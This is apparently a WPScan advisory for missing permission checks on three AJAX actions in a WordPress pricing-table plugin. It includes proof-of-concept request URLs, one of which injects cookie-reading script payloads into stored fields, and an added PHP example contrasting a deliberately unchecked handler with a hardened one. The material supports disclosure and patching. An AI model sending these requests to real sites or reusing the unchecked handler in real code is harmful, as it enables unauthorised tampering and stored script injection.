Pricing Table by Supsystic < 1.8.2 - Insecure Permissions on AJAX Actions



Description
An issue was discovered in the pricing-table-by-supsystic plugin before 1.8.2 for WordPress. Because there is no permission check on the ImportJSONTable, createFromTpl, and getJSONExportTable endpoints, unauthenticated users can retrieve pricing table information, create new tables, or import/modify a table.
Proof of Concept
URL/wp-admin/admin-ajax.php?mod=tables&action=importJSONTable&data%5B0%5D%5Bid%5D=11&data%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data%5B0%5D%5Blabel%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Boriginal_id%5D=11&data%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data%5B0%5D%5Bhtml%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bcss%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bimg%5D=gradient-standard.jpg&data%5B0%5D%5Bsort_order%5D=0&data%5B0%5D%5Bis_base%5D=1&data%5B0%5D%5Bis_pro%5D=0&data%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data%5B0%5D%5Bsession_id%5D=715993&data%5B0%5D%5Bview_id%5D=ptsBlock_715993&data%5B0%5D%5Bcat_code%5D=price_table&update_with_same_id=1&pl=pts&reqType=ajax


URL/wp-admin/admin-ajax.php?label=Test&original_id=1&mod=tables&action=createFromTpl&pl=pts&reqType=ajax

URL/wp-admin/admin-ajax.php?mod=tables&action=getJSONExportTable&tables%5B%5D=9&tables%5B%5D=8&pl=pts&reqType=ajax
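
The fix the description above calls for is an authorisation check in front of each AJAX action. The following is an added example, not code from the plugin or from this WPScan entry: a hypothetical WordPress AJAX handler for a table-import action, first in the unchecked shape the description reports, then with the nonce and capability checks that close the gap. The hook names, the pts_demo_ prefix, the manage_options capability and the field names are assumptions chosen for illustration.

```php
<?php
// Added example, not code from the plugin or the advisory. Hook names, the
// pts_demo_ prefix, the manage_options capability and the field names are
// assumptions chosen for illustration.

// Stand-in for the plugin's own storage.
function pts_demo_store_tables( array $rows ) {
    update_option( 'pts_demo_tables', $rows );
}

// --- Vulnerable shape: no nonce, no capability check, and registered for
// logged-out users too, so any visitor can import or overwrite tables. ---
function pts_demo_import_unchecked() {
    $data = isset( $_REQUEST['data'] ) ? (array) wp_unslash( $_REQUEST['data'] ) : array();
    pts_demo_store_tables( $data ); // markup in label/html is stored as-is
    wp_send_json_success();
}
add_action( 'wp_ajax_pts_demo_import_unchecked', 'pts_demo_import_unchecked' );
add_action( 'wp_ajax_nopriv_pts_demo_import_unchecked', 'pts_demo_import_unchecked' );

// --- Hardened shape: CSRF nonce, capability check, sanitised fields. ---
function pts_demo_import_checked() {
    // Dies with HTTP 403 unless a valid nonce for this action is supplied.
    check_ajax_referer( 'pts_demo_import', 'nonce' );

    // Only users who may administer the site can create or modify tables.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    $data  = isset( $_REQUEST['data'] ) ? (array) wp_unslash( $_REQUEST['data'] ) : array();
    $clean = array();
    foreach ( $data as $row ) {
        $clean[] = array(
            'id'    => isset( $row['id'] ) ? absint( $row['id'] ) : 0,
            'label' => isset( $row['label'] ) ? sanitize_text_field( $row['label'] ) : '',
            // wp_kses_post() keeps post-safe markup only; <script> is dropped.
            'html'  => isset( $row['html'] ) ? wp_kses_post( $row['html'] ) : '',
        );
    }
    pts_demo_store_tables( $clean );
    wp_send_json_success( array( 'imported' => count( $clean ) ) );
}
// Registered for logged-in users only: there is no wp_ajax_nopriv_ hook.
add_action( 'wp_ajax_pts_demo_import_checked', 'pts_demo_import_checked' );
```

The same pattern applies to read-only actions such as the export endpoint: the capability check decides who may call the action, and the nonce ties the call to a page the plugin itself rendered.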

Affects Plugin

Pricing Table by Supsystic, fixed in version 1.8.2

References

CVE-2020-9394
CVE-2020-9393
CVE-2020-9392
URL https://www.wordfence.com/blog/2020/02/multiple-vulnerabilities-patched-in-pricing-table-by-supsystic-plugin/

Classification

Type BYPASS

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 2063
Verified No
WPVDB ID 10090

Timeline

Publicly Published 2020-02-25
Added 2020-02-25
Last Updated 2020-03-24
